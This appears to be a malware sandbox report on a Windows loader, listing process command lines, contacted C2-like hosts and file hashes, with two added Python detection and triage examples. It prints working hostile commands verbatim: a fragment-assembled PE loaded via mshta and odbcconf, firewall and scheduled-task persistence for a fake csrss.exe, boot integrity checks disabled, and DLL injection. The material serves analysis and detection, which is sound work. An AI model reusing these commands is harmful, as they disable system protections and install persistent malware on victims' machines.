C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10799545d143108.exe

Wed10799545d143108.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10eb606bd1d021d.exe

"C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10eb606bd1d021d.exe" -u

C:\Users\Admin\AppData\Local\Temp\is-C6M02.tmp\Wed101f2195049.tmp

"C:\Users\Admin\AppData\Local\Temp\is-C6M02.tmp\Wed101f2195049.tmp" /SL5="$6011C,140047,56320,C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed101f2195049.exe"

C:\Users\Admin\AppData\Local\Temp\is-RCU3S.tmp\Wed10fa57e769925f6.tmp

"C:\Users\Admin\AppData\Local\Temp\is-RCU3S.tmp\Wed10fa57e769925f6.tmp" /SL5="$6022E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe"

C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp

"C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp" /SL5="$301A8,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10b607271059cb7.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCRiPT: CloSe ( CREaTeObjEcT ( "WsCrIPT.sheLl"). rUN ( "C:\Windows\system32\cmd.exe /q /c COPy /y ""C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10520e75c2eb.exe"" ..\r3AxJr.EXE && StArt ..\r3AXJr.ExE /p0HZ0v12j8OSomYiesvSh7Gq & if """" == """" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10520e75c2eb.exe"" ) do taskkill -Im ""%~nxJ"" /f " , 0 , TRue ) )

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe

"C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe" /SILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 284

C:\Users\Admin\AppData\Local\Temp\is-PST3N.tmp\Wed10fa57e769925f6.tmp

"C:\Users\Admin\AppData\Local\Temp\is-PST3N.tmp\Wed10fa57e769925f6.tmp" /SL5="$401D6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /c COPy /y "C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10520e75c2eb.exe" ..\r3AxJr.EXE && StArt ..\r3AXJr.ExE /p0HZ0v12j8OSomYiesvSh7Gq & if "" == "" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10520e75c2eb.exe" ) do taskkill -Im "%~nxJ" /f

C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE

..\r3AXJr.ExE /p0HZ0v12j8OSomYiesvSh7Gq

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "Wed10520e75c2eb.exe" /f

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed109189c07b.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed109189c07b.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCRiPT: CloSe ( CREaTeObjEcT ( "WsCrIPT.sheLl"). rUN ( "C:\Windows\system32\cmd.exe /q /c COPy /y ""C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE"" ..\r3AxJr.EXE && StArt ..\r3AXJr.ExE /p0HZ0v12j8OSomYiesvSh7Gq & if ""/p0HZ0v12j8OSomYiesvSh7Gq "" == """" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE"" ) do taskkill -Im ""%~nxJ"" /f " , 0 , TRue ) )

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed106168c8ce90b57b8.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed106168c8ce90b57b8.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /c COPy /y "C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE" ..\r3AxJr.EXE && StArt ..\r3AXJr.ExE /p0HZ0v12j8OSomYiesvSh7Gq & if "/p0HZ0v12j8OSomYiesvSh7Gq " == "" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE" ) do taskkill -Im "%~nxJ" /f

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241107052120.log C:\Windows\Logs\CBS\CbsPersist_20241107052120.cab

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBSCRipT: clOSE ( CreAteObjEcT ( "WscRIpT.shell" ). ruN ( "CMD.eXe /R Echo | SET /p = ""MZ"" > b01RrZ3N.ZT & CoPY /b /y B01RRZ3N.ZT + s4FCF.WN + YcQIVW._ ..\GOWX.SHv & starT odbcconf /A { rEgsvR ..\GOwX.SHv } & DEL /Q * ", 0 , True ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R Echo | SET /p = "MZ" > b01RrZ3N.ZT & CoPY /b /y B01RRZ3N.ZT + s4FCF.WN + YcQIVW._ ..\GOWX.SHv & starT odbcconf /A {rEgsvR ..\GOwX.SHv } & DEL /Q *

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Echo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>b01RrZ3N.ZT"

C:\Windows\SysWOW64\odbcconf.exe

odbcconf /A {rEgsvR ..\GOwX.SHv }

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe

"C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe /306-306

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Program Files (x86)\Gparted\Build.sfx.exe

"C:\Program Files (x86)\Gparted\Build.sfx.exe" -p123 -s1

C:\Program Files (x86)\Gparted\Build.exe

"C:\Program Files (x86)\Gparted\Build.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com

C:\Program Files (x86)\Gparted\gimagex.exe

"C:\Program Files (x86)\Gparted\gimagex.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.yahoo.com

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1624 -s 1680

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
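
The command lines above read as a checklist of the loader's defensive and persistence moves: Defender real-time monitoring switched off and a Temp exclusion added through Set-MpPreference and Add-MpPreference, an mshta-hosted VBScript that assembles a PE from fragments (SET /p "MZ" followed by COPY /b) and loads it through odbcconf /A {regsvr ...}, a netsh allow rule and an ONLOGON scheduled task for a csrss.exe that lives in C:\Windows\rss instead of System32, bcdedit options that set nointegritychecks 1 and recoveryenabled 0 on a new boot entry, and an injector that loads a hook DLL into taskmgr.exe. The Python below is an added example, not part of this report or of any tool the report names: a small rule set that runs over those command lines (copied from the list above, plus two benign ones as negative controls) and tags each hit with an ATT&CK technique id. The rule names, the regexes and the core-process-name list are this example's own choices. A core Windows process name outside System32 or SysWOW64 is flagged as masquerading; the remaining rules are plain case-insensitive patterns (the case-mangled mshta/odbcconf invocations here are why) and will need tuning against real telemetry before they are used for alerting.

```python
"""Command-line triage rules for the process list above (added example)."""
import re
from dataclasses import dataclass

# Constructed sample: command lines copied from the Processes section of this
# report, plus two benign ones (indices 11 and 12) as negative controls.
SAMPLE_CMDLINES = [
    r'C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable',
    r'powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"',
    r'"C:\Windows\System32\mshta.exe" VBSCRipT: clOSE ( CreAteObjEcT ( "WscRIpT.shell" ). ruN ( "CMD.eXe /R Echo | SET /p = ""MZ"" > b01RrZ3N.ZT & CoPY /b /y B01RRZ3N.ZT + s4FCF.WN + YcQIVW._ ..\GOWX.SHv & starT odbcconf /A { rEgsvR ..\GOwX.SHv } & DEL /Q * ", 0 , True ) )',
    r'"C:\Windows\System32\cmd.exe" /R Echo | SET /p = "MZ" > b01RrZ3N.ZT & CoPY /b /y B01RRZ3N.ZT + s4FCF.WN + YcQIVW._ ..\GOWX.SHv & starT odbcconf /A {rEgsvR ..\GOwX.SHv } & DEL /Q *',
    r'odbcconf /A {rEgsvR ..\GOwX.SHv }',
    r'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes',
    r'C:\Windows\rss\csrss.exe /306-306',
    r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F',
    r'C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1',
    r'C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0',
    r'C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com',
    r'C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn',
]


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str          # MITRE ATT&CK technique id
    pattern: re.Pattern


FLAGS = re.IGNORECASE | re.DOTALL   # LOLBin calls here are deliberately case-mangled
RULES = (
    Rule("defender_realtime_off", "T1562.001",
         re.compile(r'Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$true', FLAGS)),
    Rule("defender_exclusion_added", "T1562.001",
         re.compile(r'Add-MpPreference\b.*-ExclusionPath\b', FLAGS)),
    Rule("mshta_inline_vbscript", "T1218.005",
         re.compile(r'\bmshta(?:\.exe)?\b.*vbscript:', FLAGS)),
    Rule("odbcconf_regsvr_lolbin", "T1218.008",
         re.compile(r'\bodbcconf(?:\.exe)?\b.*\bregsvr\b', FLAGS)),
    # "MZ" written with SET /P, then COPY /B concatenation: a PE assembled from fragments
    Rule("mz_header_assembly", "T1140",
         re.compile(r'^(?=.*\bset\s*/p\s*=\s*"*MZ)(?=.*\bcopy\s+/b\b)', FLAGS)),
    Rule("firewall_allow_rule_added", "T1562.004",
         re.compile(r'\bnetsh(?:\.exe)?\b.*advfirewall\s+firewall\s+add\s+rule\b.*action=allow', FLAGS)),
    Rule("scheduled_task_highest_privileges", "T1053.005",
         re.compile(r'\bschtasks(?:\.exe)?\b.*/create\b.*/rl\s+highest\b', FLAGS)),
    Rule("bcdedit_disable_integrity_checks", "T1553.006",
         re.compile(r'\bbcdedit(?:\.exe)?\b.*\bnointegritychecks\s+1\b', FLAGS)),
    Rule("bcdedit_disable_recovery", "T1490",
         re.compile(r'\bbcdedit(?:\.exe)?\b.*\brecoveryenabled\s+0\b', FLAGS)),
    # "<tool>.exe <target>.exe <module>.dll": the usual CLI shape of a DLL injector
    Rule("dll_injection_cli_pattern", "T1055.001",
         re.compile(r'\.exe\s+[\w.-]+\.exe\s+\S+\.dll\s*$', FLAGS)),
)

# Core process names that legitimately live only in these two directories (example's list).
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
CORE_NAMES = ("csrss", "smss", "lsass", "wininit", "winlogon", "services", "svchost")
CORE_PATH_RE = re.compile(
    r'(?P<dir>[a-z]:\\(?:[^\\"\s]+\\)*)(?P<name>' + "|".join(CORE_NAMES) + r')\.exe\b',
    re.IGNORECASE)


def masquerade_hits(cmdline):
    """Flag a core Windows process name located outside System32/SysWOW64 (T1036.005)."""
    for m in CORE_PATH_RE.finditer(cmdline):
        if m.group("dir").rstrip("\\").lower() not in SYSTEM_DIRS:
            return [("system_binary_name_outside_system32", "T1036.005")]
    return []


def scan(cmdline):
    """Return the (rule name, ATT&CK id) pairs that fire on one command line."""
    hits = [(r.name, r.technique) for r in RULES if r.pattern.search(cmdline)]
    hits.extend(masquerade_hits(cmdline))
    return hits


def triage(cmdlines):
    """Group command-line indices by rule; 'clean' holds indices nothing fired on."""
    by_rule, clean = {}, []
    for i, cmd in enumerate(cmdlines):
        hits = scan(cmd)
        if not hits:
            clean.append(i)
        for name, _tid in hits:
            by_rule.setdefault(name, []).append(i)
    return by_rule, clean


if __name__ == "__main__":
    by_rule, clean = triage(SAMPLE_CMDLINES)
    for name, idx in by_rule.items():
        print(f"{name:40s} cmdlines {idx}")
    print("no rule fired on:", clean)
```

On the sample, every malicious line fires at least one rule and the two controls fire none; the netsh and schtasks lines fire twice because they also name the relocated csrss.exe, which is the kind of corroboration that makes the masquerading rule worth keeping separate from the tool-specific ones.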

Network

Country Destination Domain Proto
(repeated rows collapsed; "xN" is the number of identical rows in the report)
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 www.listincode.com udp
US 54.205.158.59:443 www.listincode.com tcp
US 52.203.72.196:443 www.listincode.com tcp
US 8.8.8.8:53 fouratlinks.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
DE 49.12.219.50:4846 tcp (x24)
FI 65.108.69.168:16278 tcp (x6)
US 8.8.8.8:53 webdatingcompany.me udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 tweakballs.com udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp (x3)
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 buy-fantasy-gxmes.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 boomboomrequest.com udp
US 8.8.8.8:53 trumops.com udp
US 8.8.8.8:53 retoti.com udp
US 8.8.8.8:53 logs.trumops.com udp
US 8.8.8.8:53 logs.retoti.com udp
US 8.8.8.8:53 5db277e5-75ca-4a48-919e-6819660c98de.uuid.trumops.com udp
US 8.8.8.8:53 server6.trumops.com udp
US 44.221.84.105:443 server6.trumops.com tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.79.68:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 www.google.com udp
US 72.84.118.132:8080 tcp (x2)
US 8.8.8.8:53 www.yahoo.com udp
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.22:443 bitbucket.org tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.18:80 crl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard20.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard20.blob.core.windows.net tcp
US 8.8.8.8:53 dumancue.com udp
US 8.8.8.8:53 server6.retoti.com udp
US 44.221.84.105:443 server6.retoti.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 2AZZARITA.hopto.org udp
US 44.209.47.121:50001 2AZZARITA.hopto.org tcp
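
Most of the repetition in the table above is two destinations: 49.12.219.50:4846 (24 rows) and 65.108.69.168:16278 (6 rows), both contacted by bare IP on a non-standard port with no DNS lookup for them anywhere in the table, which is the usual shape of a hard-coded C2 address; 72.84.118.132:8080 and the hopto.org dynamic-DNS name on port 50001 are the other stand-outs, while the iplogger.org, discordapp.com and microsoft.com connections all have a resolved name and a standard port. The Python below is an added example (not part of this report or of the sandbox that produced it) that turns that eyeballing into a repeatable triage step: it parses rows in the report's own layout, treats UDP/53 rows as resolutions and TCP rows as connections, and flags TCP destinations that were never seen with a name or that use a port outside an allow-list, most-contacted first. The sample rows are a constructed subset of the table above, so the counts in the output are for the subset only; the port allow-list and the reason labels are this example's choices. The result is a ranking aid, not a verdict: a resolution that happened before the capture started, a legitimate updater with a hard-coded address, or a CDN IP fronting many names will all score.

```python
"""Rank sandbox network rows by how much they look like C2 (added example)."""
import re
from collections import defaultdict

# Constructed sample: a subset of the rows from the Network table above, in the
# report's own "<country> <ip:port> [<domain>] <proto>" layout.
SAMPLE_ROWS = """\
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
DE 49.12.219.50:4846 tcp
FI 65.108.69.168:16278 tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
US 72.84.118.132:8080 tcp
DE 49.12.219.50:4846 tcp
FI 65.108.69.168:16278 tcp
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.22:443 bitbucket.org tcp
US 72.84.118.132:8080 tcp
DE 49.12.219.50:4846 tcp
US 8.8.8.8:53 2AZZARITA.hopto.org udp
US 44.209.47.121:50001 2AZZARITA.hopto.org tcp
"""

ROW_RE = re.compile(
    r'^(?P<cc>[A-Z]{2})\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)'
    r'(?:\s+(?P<domain>\S+))?\s+(?P<proto>tcp|udp)$')

# Ports an ordinary loader would also use; anything else raises the score (example's choice).
COMMON_PORTS = {80, 443}


def parse_rows(text):
    """Parse the flat table into dicts; lines that do not fit the layout are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            row = m.groupdict()
            row["port"] = int(row["port"])
            rows.append(row)
    return rows


def rank_destinations(rows, common_ports=COMMON_PORTS):
    """Flag TCP destinations with no resolved name or an uncommon port, most-contacted first."""
    count = defaultdict(int)
    domains = defaultdict(set)
    for r in rows:
        if r["proto"] != "tcp":
            continue                       # UDP rows here are the DNS lookups themselves
        key = (r["ip"], r["port"])
        count[key] += 1
        if r["domain"]:
            domains[key].add(r["domain"])
    flagged = []
    for key, n in count.items():
        reasons = []
        if not domains[key]:
            reasons.append("no_dns_name")  # connected straight to the IP
        if key[1] not in common_ports:
            reasons.append("uncommon_port")
        if reasons:
            flagged.append({"ip": key[0], "port": key[1], "count": n,
                            "domains": sorted(domains[key]), "reasons": reasons})
    flagged.sort(key=lambda f: (-f["count"], f["ip"]))
    return flagged


if __name__ == "__main__":
    for f in rank_destinations(parse_rows(SAMPLE_ROWS)):
        print(f"{f['ip']}:{f['port']}  x{f['count']}  {','.join(f['reasons'])}  {f['domains']}")
```

On the subset the two bare-IP hosts come out on top with both reasons set, 72.84.118.132:8080 follows, and the hopto.org host is flagged on port alone; the three iplogger.org connections are not flagged, which is the intended behaviour even though iplogger.org itself is worth a look in the process context above.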

Files

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe

MD5 b6140096778ba8327684188903b829f9
SHA1 a8c542ed9b1c29d07cc5c955ef29f3f92531887c
SHA256 32096a36f4ce1bfed14e19eedfd6b882e997c38241a182142332a2bf4c9dbb64
SHA512 7f8fa614fae4aa6622d28f228f5b39a90ebf66f598acb06bbc2a219aeab6a1409393dcd82a03b60e418671c66f9c3da9510fdea9a3aa19716daf9385925f0c6f

\Users\Admin\AppData\Local\Temp\7zS078C18A6\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/2848-58-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2848-61-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/2848-71-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2848-70-0x000000006494A000-0x000000006494F000-memory.dmp

memory/2848-69-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2848-72-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2848-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2848-74-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2848-73-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2848-80-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2848-79-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2848-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2848-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2848-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10d7483856.exe

MD5 6d8ff7889acdcfd9f785e073e6ab4f4d
SHA1 5a878803d1c355fae35d684f59f26c1b4a838e6c
SHA256 8e50b8cdea9a829fe00a3d81bad328f6f76581d20ba9cc8cf6d8642d0aa882c7
SHA512 fcb23c40e31839402927dc1cdecf750d4c32c609f42337741f400069c8763599ad6604ed9d7fd86d7d6ee7d6f7b4eca7d132ceb5796f2dad99223e619897b3ab

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe

MD5 314e3dc1f42fb9d858d3db84deac9343
SHA1 dec9f05c3bcc759b76f4109eb369db9c9666834b
SHA256 79133c9e1cdfdfada9bc3d49ba30d872c91383eb7515302cd7bd2e1c5b983b08
SHA512 23f6c8f785c6d59d976d437732d1ea5968403239c5f8c3ca83983d1a0b3d9f8426803b7de7c2e819d16a1fb35f9e24461593fdcc75cd81ddc0076c22ed1e45f2

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed101f2195049.exe

MD5 5eec35ae4619a7992130f13f66b03002
SHA1 47141ead2a1166234970c3dba5821cee57ddbb4d
SHA256 947efb32f120d30758ff6801dd1118922cff317411e87906aa9153fe928b1156
SHA512 5f8ae8110b7aa626cf1002f1f214ccc2fd09956cb9d2d82d31115adee356ffd529d1eef4f32a2f193fd862029f930ad01f068b22335d61a00ae5b25106c0590a

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10a80f141fb08.exe

MD5 f4a5ef05e9978b2215c756154f9a3fdb
SHA1 c933a1debeea407d608464b33588b19c299295c6
SHA256 d3a6b444ced1db9e9452bb5fc1f652b0d6b519948ed2e6e348036d2c25147f69
SHA512 f2d11f706d552c21b75f36c8e02edcb9251c95298986b17d48fb179f2f8d1e2e7ef99de9485ba7ee92dd118ad5759b6fa82197319a40b45044fdbdf039582d77

\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10a0affb29d.exe

MD5 d60755a29f9dc368fe71fbadf96b640c
SHA1 d3ac47604f6d91cbc76d9013ba9b3c779f69ad27
SHA256 1129ef957be36f46c5ba500a3f48a237069006b699d570360f876f6c186a7606
SHA512 7dadfa4c0401e688ef0ab6f2c5b175f4943243bd97c4310f0f0bbb9fd7f096e80993ea4e9d598109ee6d0436ff2331d485966c831054960cf62ce97b58102c8a

\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10520e75c2eb.exe

MD5 18c977c8af2d6a4491109f686b8430ec
SHA1 4265fe935115de077d22f3279b1cf5626a28a623
SHA256 cec7c81038db8fe58fb50abd445d9b48d7b0d575a5c934f7a7d5c53a0be8a0ac
SHA512 4a56c2356b7c41fc9dbd36e02f103f9938d0fe221dd5149705f9ea58e53af6d8da58e1216a77ff792c8ead8aca7a1c052c8d204435e7f4364e3e4cd5b9d54f72

\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe

MD5 0426dbe3753b2d07d3612fceb824a182
